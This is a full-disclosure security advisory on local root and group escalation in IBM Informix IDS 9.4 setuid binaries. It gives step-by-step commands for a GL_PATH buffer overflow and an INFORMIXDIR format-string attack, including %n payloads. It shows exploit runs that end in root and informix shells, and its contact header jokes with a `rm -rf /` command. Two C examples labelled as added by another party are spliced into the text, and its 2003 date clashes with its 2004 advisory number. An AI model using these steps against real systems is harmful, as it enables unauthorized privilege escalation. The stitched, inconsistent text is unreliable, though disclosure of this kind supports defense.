[VulnWatch] SRT2004-01-18-0747 - IBM Informix IDS 9.4 contains multiple vulnerabilities

From: KF (dotslash_at_snosoft.com)
Date: 03/14/03

  • Next message: KF: "[VulnWatch] SRT2004-01-17-0227 - BlackICE allows local users to become SYSTEM"
    Date: Fri, 14 Mar 2003 01:18:51 -0500
    To: full-disclosure@lists.netsys.com
    Secure Network Operations, Inc. http://www.secnetops.com/research
    Strategic Reconnaissance Team research[at]secnetops[.]com
    Team Lead Contact kf[at]secnetops[.]com
    Spam Contact `rm -rf /`@snosoft.com

    Our Mission:
    ************************************************************************
    Secure Network Operations offers expertise in Networking, Intrusion
    Detection Systems (IDS), Software Security Validation, and
    Corporate/Private Network Security. Our mission is to facilitate a
    secure and reliable Internet and inter-enterprise communications
    infrastructure through the products and services we offer.

    To learn more about our company, products and services or to request a
    demo of ANVIL FCS please visit our site at http://www.secnetops.com, or
    call us at: 978-263-3829

    Quick Summary:
    ************************************************************************
    Advisory Number : SRT2004-01-18-0747
    Product : IBM Informix IDS
    Version : 9.40.xC[12] (tested 9.40.UC1)
    Vendor : http://www-3.ibm.com/software/data/informix/
    Class : Local
    Criticality : High
    Operating System(s) : *nix

    Notice
    ************************************************************************
    1-2 day Early Warning List:
    ---------------------------
    Secure Network Operations, Inc. will very shortly have its own advisory
    notification mailing list. This list will notify you of advisories 1-2
    days in advance of public release to other mailing lists. To subscribe
    please visit http://advisories.secnetops.com in the immediate future.

    30-60 day Early Warning List:
    -----------------------------
    Our early warning service will notify you of new vulnerabilities 30-60
    days in advance of public release. This service has been created to protect
    companies by allowing them to repair security vulnerabilities before they
    become public knowledge. To purchase a one year subscription to this
    service please contact us at 978-263-3767.

    Alert
    ***********************************************************************
    Our advisories will contain full details excluding a working Proof of
    Concept. Our web page will contain our working proof of concept for the
    advisory if it exists. Yes folks, this is a policy change for us. We
    will exercise our own discretion in regards to the delay between exploit
    release and advisory release. List subscribers will have advance access
    to working proof of concept code depending on the severity and list
    subscription type.

    Basic Explanation
    ************************************************************************
    High Level Description : IDS 9.4 contains multiple vulnerabilities

    What to do : Update to the IDS 9.40.UC3, 9.30.UC7 and 7.31.UD7
                 fix pack releases

    Basic Technical Details
    ************************************************************************
    Proof Of Concept Status : SNO has Proof of Concept.

    Low Level Description : Informix Dynamic Server 9.4 is a best-of-breed
    online transaction processing database for enterprise and workgroup
    computing. IDS is built on Dynamic Scalable Architecture that uses
    hardware resources more efficiently and minimizes hardware requirements.

    During routine product evaluation we noticed several setuid and setgid
    binaries that contained security issues. Our Informix installation came
    with the following setuid and setgid files:

    -rwsr-sr-- 1 root informix 10153315 Jul 19 12:30 ./oninit
    -rwsr-sr-x 1 root informix 1019813 Jul 19 12:30 ./onmode
    -rwsr-sr-x 1 root informix 1066468 Mar 15 11:47 ./onedcu
    -rwsr-sr-x 1 root informix 13443 Mar 15 11:46 ./ifmxgcore
    -rwsr-sr-x 1 root informix 1615730 Jul 19 12:30 ./ontape
    -rwsr-sr-x 1 root informix 1831430 Mar 15 11:51 ./ondblog
    -rwsr-sr-x 1 root informix 1897244 Jul 19 12:30 ./onbar_d
    -rwsr-sr-x 1 root informix 1909871 Jul 19 12:30 ./onsmsync
    -rwsr-sr-x 1 root informix 2143212 Jul 19 12:30 ./onmonitor
    -rwsr-sr-x 1 root informix 511534 Mar 15 11:53 ./sgidsh
    -rwsr-sr-x 1 root informix 511623 Mar 15 11:53 ./mkdbsdir
    -rwsr-sr-x 1 root informix 537232 Jul 19 12:30 ./onshowaudit
    -rwsr-sr-x 1 root informix 948490 Jul 19 12:30 ./onaudit
    -rwxr-sr-x 1 informix informix 1063801 Mar 15 11:47 ./xtree
    -rwxr-sr-x 1 informix informix 1196928 Jul 19 12:29 ./onspaces
    -rwxr-sr-x 1 informix informix 1199645 Jul 19 12:29 ./onparams
    -rwxr-sr-x 1 informix informix 1314460 Jul 19 12:29 ./onlog
    -rwxr-sr-x 1 informix informix 1438131 Jul 19 12:29 ./oncheck
    -rwxr-sr-x 1 informix informix 2235020 Jul 19 12:29 ./onpload
    -rwxr-sr-x 1 informix informix 3974843 Jul 19 12:29 ./onstat
    -rwxr-sr-x 1 informix informix 539519 Mar 15 11:47 ./onedpu
    -rwxr-sr-x 1 informix informix 895422 Jul 19 12:29 ./onload
    -rwxr-sr-x 1 informix informix 895424 Jul 19 12:29 ./onunload

    Most, if not all, of the binaries share the same exploitable conditions.
    The first issue we noticed was a simple buffer overflow triggered by an
    overly long GL_PATH environment variable.

    [informix@vegeta bin]$ export GL_PATH=`perl -e 'print "A" x 998'`
    [informix@vegeta bin]$ ./xtree
    Segmentation fault

    A quick run in gdb shows the following. At 3068 bytes plus "ABCD" the
    crash is in strlen() called by sprintf() inside gl_path_search1(), and
    eax and esi hold 0x44434241 (our "ABCD"): the overflow has overwritten a
    pointer that a later %s conversion dereferences. Smaller string lengths
    reveal that exploitation may be complicated by a few intervening free()
    calls.

    [root@vegeta bin]# export GL_PATH=`perl -e 'print "A" x 3068'`ABCD

    (gdb) i r
    eax 0x44434241 1145258561
    ecx 0x1 1
    edx 0x53 83
    ebx 0x401f21c0 1075782080
    esp 0xbfffcaf0 0xbfffcaf0
    ebp 0xbfffd1ac 0xbfffd1ac
    esi 0x44434241 1145258561
    edi 0xbfffcd4c -1073754804
    eip 0x401361db 0x401361db
    ...
    (gdb) bt
    #0 0x401751db in strlen () from /lib/libc.so.6
    #1 0x40144c7e in vfprintf () from /lib/libc.so.6
    #2 0x4015fb2c in vsprintf () from /lib/libc.so.6
    #3 0x4014d02d in sprintf () from /lib/libc.so.6
    #4 0x080a2138 in gl_path_search1 ()

    [informix@vegeta bin]$ for each in `find . -perm -2000 -user informix`
    > do
    > echo $each
    > $each
    > done
    ./onstat
    Segmentation fault
    ./onspaces
    Segmentation fault
    ./onparams
    Segmentation fault
    ./onload
    Segmentation fault
    ./oncheck
    Segmentation fault
    ./onunload
    Segmentation fault

    [informix@vegeta bin]$ for each in `find . -perm -4000`
    > do
    > echo $each
    > $each
    > done
    ./oninit
    Segmentation fault
    ./onmode
    Segmentation fault
    ./onedcu
    Segmentation fault
    ./onshowaudit
    Segmentation fault
    ./onaudit
    Segmentation fault
    ./onbar_d
    Segmentation fault
    ./ondblog
    Segmentation fault
    ./onsmsync
    Segmentation fault
    ./ontape
    Segmentation fault
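    As an added example (not Informix code, and not from the advisory's
    authors): the pattern the backtrace above implies, an unbounded
    sprintf() of an environment-supplied directory into a fixed buffer
    inside a set-id program, shown next to a bounded version that also
    refuses to read the environment at all when the process is set-uid or
    set-gid. The function names, the buffer size, the default directory,
    the use of 0333.lco as the file looked up under GL_PATH and the
    trusted_getenv() helper are all assumptions for the example.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Assumed size of the fixed buffer that gl_path_search1() formats into;
 * the real size is not known from the advisory. */
#define PATH_BUF 1024

/* Vulnerable shape (assumed from the backtrace): an unbounded sprintf()
 * of an environment-supplied directory into a fixed-size buffer.  A value
 * longer than PATH_BUF runs off the end of `path`, which is what the
 * 998-byte and 3068-byte GL_PATH values on the page provoke. */
int gl_path_search_vuln(const char *gl_path, const char *file, char *path)
{
    sprintf(path, "%s/%s", gl_path, file);   /* no length check at all */
    return 0;
}

/* Environment lookup that refuses to trust the caller's environment when
 * the process is running set-uid or set-gid (real and effective ids differ).
 * A set-id program that honours GL_PATH or INFORMIXDIR from an unprivileged
 * user's environment hands that user control over what it opens. */
const char *trusted_getenv(const char *name)
{
    if (getuid() != geteuid() || getgid() != getegid())
        return NULL;
    return getenv(name);
}

/* Hardened shape: bounded formatting with an explicit truncation check and
 * a compiled-in default directory (assumed) when the variable is absent or
 * untrusted.  Returns 0 on success, -1 if the result would not fit. */
int gl_path_search_safe(const char *gl_path, const char *file,
                        char *path, size_t pathsz)
{
    const char *base = gl_path ? gl_path : "/usr/informix/gls";
    int n = snprintf(path, pathsz, "%s/%s", base, file);
    if (n < 0 || (size_t)n >= pathsz) {
        path[0] = '\0';
        return -1;                /* would have overflowed: refuse, don't truncate */
    }
    return 0;
}

int main(void)
{
    char path[PATH_BUF];
    char *attacker = malloc(3072 + 1);   /* stands in for the 3068 x "A" + "ABCD" test */
    memset(attacker, 'A', 3072);
    attacker[3072] = '\0';

    if (gl_path_search_safe(attacker, "0333.lco", path, sizeof path) == -1)
        puts("GL_PATH too long: rejected instead of overflowing");

    /* A short value from a trusted environment (or the default) formats normally. */
    if (gl_path_search_safe(trusted_getenv("GL_PATH"), "0333.lco", path, sizeof path) == 0)
        printf("search path: %s\n", path);

    free(attacker);
    return 0;
}
```

    The point of trusted_getenv() is that the listing above is full of
    binaries owned by root or informix with the set-id bits on; every one
    of them that reads GL_PATH or INFORMIXDIR from a caller's environment
    is letting an unprivileged user pick the input to the privileged code.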

    The next vulnerability we discovered is a bit more complex. When the
    Informix binaries start they look for several message and configuration
    files relative to the INFORMIXDIR environment variable, which the
    unprivileged user running a setuid root or setgid informix binary
    controls.

    If we set INFORMIXDIR to /tmp we can see it begins searching /tmp for the
    necessary files.

    [root@vegeta bin]# export INFORMIXDIR=/tmp
    [root@vegeta bin]# strace ./onmonitor
    execve("./onmonitor", ["./onmonitor"], [/* 34 vars */]) = 0
    ...
    open("/tmp/en_us/0333.lco", O_RDONLY|O_LARGEFILE)
    open("/tmp/etc/informix.rc", O_RDONLY|O_LARGEFILE)
    open("/tmp/os/en_US.819", O_RDONLY|O_LARGEFILE)
    open("/tmp/registry", O_RDONLY)

    Which files are searched for depends on the application you are
    exploiting.

    Below we use /usr/informix/bin/oncheck as an example. The strace shows
    it reading its error text from olutil.iem and then handing that text to
    printf().

    [root@vegeta informix]# bin/oncheck -cc aaa
    shared memory not initialized for INFORMIXSERVER '<NULL>'

    [root@vegeta bin]# strace bin/oncheck -cc aaa
    ...
    strcat("/usr/informix/msg/en_us/0333"..., "olutil.iem")
    access("/usr/informix/msg/en_us/0333"..., 4)
    lseek64(3, 37251, 0, 0, 0)
    read(3, "shared memory no"..., 55)
    strcpy(0x081da720, "shared memory no"...)
    printf("shared memory not initialized for INFORMIXSERV"...

    Since we control INFORMIXDIR we control the message file, and the
    message text is passed straight to printf() as its format string (note
    the strcpy() into 0x081da720 followed by printf() of the same text, with
    no literal format in between), so it is fairly trivial to inject format
    string directives into the various error messages.

    Since INFORMIXDIR contains many items the binaries need, we must first
    make a copy of it. The easiest way of doing this is to recreate the
    directory layout under /tmp and symlink every file into it.

    [kf@vegeta kf]$ cd /tmp
    [kf@vegeta tmp]$ for each in `find /usr/informix/ -type d`; do mkdir -p ./$each ; done
    [kf@vegeta tmp]$ for each in `find /usr/informix ! -type d`; do ln -s $each ./$each; done

    Since we need to edit the message file we must remove the link for
    olutil.iem and copy the real file into its place.

    [kf@vegeta tmp]$ rm usr/informix/msg/en_us/0333/olutil.iem
    [kf@vegeta tmp]$ cp /usr/informix/msg/en_us/0333/olutil.iem usr/informix/msg/en_us/0333/

    Using the above oncheck example we will need to edit the olutil.iem.

    Open up usr/informix/msg/en_us/0333/olutil.iem in vi and search for:
    shared memory not initialized for INFORMIXSERVER '<NULL>'

    As a test we can change the text to the following (^@ is vi's rendering
    of the NUL byte in front of the message; leave it in place, and note the
    message is read at a fixed offset and length, the lseek64()/read(...,
    55) above, so keep the edited text no longer than the original):
    ^@%x.%x. memory not initialized for INFORMIXSERVER '%s'

    Running the binary again, with INFORMIXDIR pointing at the copy under
    /tmp/usr/informix, shows that we have hit paydirt.
    [kf@vegeta tmp]$ bin/oncheck -cc aaa
    81da718.bfffda08. memory not initialized for INFORMIXSERVER '�jhC�'

    Obviously if we change the message to the following it becomes more
    interesting:
    %n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n

    [kf@vegeta tmp]$ bin/oncheck -cc aaa
    Segmentation fault

    Gdb shows us the obvious...
    Program received signal SIGSEGV, Segmentation fault.
    0x40144f56 in vfprintf () from /lib/libc.so.6
    (gdb) bt
    #0 0x40144f56 in vfprintf () from /lib/libc.so.6
    #1 0x4014cfb2 in printf () from /lib/libc.so.6
    #2 0x0804b946 in main ()

    Strace shows us in detail what is going on.

    [080b1a11] strcat("/tmp/usr/informix/msg/en_us/0333"..., "olutil.iem")
    [080fc03b] access("/tmp/usr/informix/msg/en_us/0333"..., 4)
    [080d9613] lseek64(3, 37251, 0, 0, 0) = 37251
    [080d95f2] read(3, "%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n"..., 55) = 55
    [080b0207] strcpy(0x081da720, "%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n"...) = 0x081da720
    [0804b946] printf("%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n"... <unfinished ...>
    [40144f56] --- SIGSEGV (Segmentation fault) ---
    [ffffffff] +++ killed by SIGSEGV +++
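    As an added example (not Informix code, and not from the advisory's
    authors): the shape of the bug the strace shows, catalog text read from
    a file under an attacker-controlled INFORMIXDIR used directly as the
    printf() format, beside a hardened version that validates the text
    against the fixed argument list before using it. The function names,
    the INFORMIXSERVER name and the fallback message are constructed; the
    three catalog strings reproduce the genuine message and the two test
    edits from this advisory.

```c
#include <stdio.h>
#include <string.h>

/* Constructed stand-ins for olutil.iem entries.  The first is the genuine
 * message text from the advisory; the other two are the advisory's test
 * edits (a %x leak and a run of %n writes). */
static const char *CATALOG_GOOD =
    "shared memory not initialized for INFORMIXSERVER '%s'\n";
static const char *CATALOG_LEAK =
    "%x.%x. memory not initialized for INFORMIXSERVER '%s'\n";
static const char *CATALOG_EVIL = "%n%n%n%n%n%n%n%n%n%n";

/* Vulnerable shape: text read from $INFORMIXDIR/msg/... is used directly as
 * the printf() format.  Because INFORMIXDIR comes from the environment, an
 * unprivileged user chooses the format that a set-uid binary executes. */
void report_vuln(const char *msg, const char *server)
{
    printf(msg, server);
}

/* Check that `fmt` contains exactly the conversions listed in `allowed`, in
 * order, as bare conversion characters: no flags, width, precision or length
 * modifiers, no positional "$" arguments and never %n.  "%%" is a literal.
 * Returns 1 if fmt is usable with the fixed argument list, else 0. */
int format_is_safe(const char *fmt, const char *allowed)
{
    const char *a = allowed;
    for (const char *p = fmt; *p; p++) {
        if (*p != '%')
            continue;
        p++;
        if (*p == '%')
            continue;                      /* escaped percent sign */
        if (*a == '\0' || *p != *a)
            return 0;                      /* surplus, wrong or forbidden conversion */
        a++;
    }
    return *a == '\0';                     /* every expected argument was consumed */
}

/* Hardened shape: catalog text is data until it is proven to match the
 * argument list; otherwise a compiled-in message is used.  Output is
 * formatted into a caller-supplied buffer.  Returns 0, or -1 on truncation. */
int report_safe(const char *msg, const char *server, char *out, size_t outsz)
{
    const char *fmt = format_is_safe(msg, "s")
        ? msg
        : "shared memory not initialized for INFORMIXSERVER '%s'\n";
    int n = snprintf(out, outsz, fmt, server);
    return (n >= 0 && (size_t)n < outsz) ? 0 : -1;
}

int main(void)
{
    char out[256];
    const char *server = "ol_vegeta";          /* constructed INFORMIXSERVER name */

    report_vuln(CATALOG_GOOD, server);         /* harmless only because the text is */
    /* report_vuln(CATALOG_EVIL, server) would write through whatever %n finds
     * on the stack, which is the SIGSEGV inside vfprintf() shown above. */

    report_safe(CATALOG_GOOD, server, out, sizeof out);
    fputs(out, stdout);                        /* accepted: exactly one %s */
    report_safe(CATALOG_LEAK, server, out, sizeof out);
    fputs(out, stdout);                        /* rejected: surplus %x conversions */
    report_safe(CATALOG_EVIL, server, out, sizeof out);
    fputs(out, stdout);                        /* rejected: %n */
    return 0;
}
```

    Compilers flag the non-literal format in report_safe() with
    -Wformat-nonliteral; the allow-list check is what justifies it. Where a
    catalog entry needs no substitution at all, printing it with a literal
    "%s" format is simpler still, and none of this matters if the message
    directory is a compiled-in path rather than one taken from the
    environment of a set-id process.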

    We currently have two different Proof of Concept exploits for the above
    mentioned conditions. One takes gid informix and the other uid root.
    The data below shows a test run of each one.

    bash$ ./0x82-Local.InformixIDS -t0 -d /tmp/informix/ -g 999

      IBM Informix IDS 9.40 format string exploit.

      [+] Target Program: /usr/informix/bin/onparams
      [+] .dtors address: 0x81206ec
      [+] Shellcode address: 0xbfffffb3
      [+] flag and pad brute-force mode: (100:0)
      ...
      [*] Found it !!! (102:3)
      [*] Waiting shell ...

          ...
                                     ...
                                            81876d8
                       ...
                      0d for INFORMIXSERVER '(null)'
     sh-2.04$ id
     uid=500(x82) gid=999(informix) groups=500(x82)

    and

     bash$ ./0x82-InformixIDS_r00t -d /tmp/informix/

      IBM Informix IDS 9.40 format string local root exploit.

      [+] Target Program: /usr/informix/bin/ontape
      [+] .dtors address: 0x817c8e4
      [+] Shellcode address: 0xbfffffb3
      [+] flag and pad brute-force mode: (100:0)
      .......................................................
      [*] Found it !!! (212:0)
      [*] Waiting root shell ...

          ...
                                     ...
                                              bfff769c
                        ...
                   0guration file $INFORMIXDIR/etc/$ONCONFIG.

     Program over.
     sh-2.04# id
     uid=0(root) gid=0(root)

    Vendor Status : IBM addressed this issue in a prompt, efficient and
    intelligent manner. Jonathan Leffler really stepped up to the plate, so
    to speak, and provided the SRT with more than enough information
    regarding this issue as well as the actions taken to resolve it!

    Bugtraq URL : To be assigned.

    Disclaimer
    ----------------------------------------------------------------------
    This advisory was released by Secure Network Operations,Inc. as a matter
    of notification to help administrators protect their networks against
    the described vulnerability. Release of exploit code is done at our
    own discretion.
    ----------------------------------------------------------------------
    All content of this advisory is property of Secure Network Operations.
    ----------------------------------------------------------------------
    Secure Network Operations, Inc. || http://www.secnetops.com
    "Embracing the future of technology, protecting you."

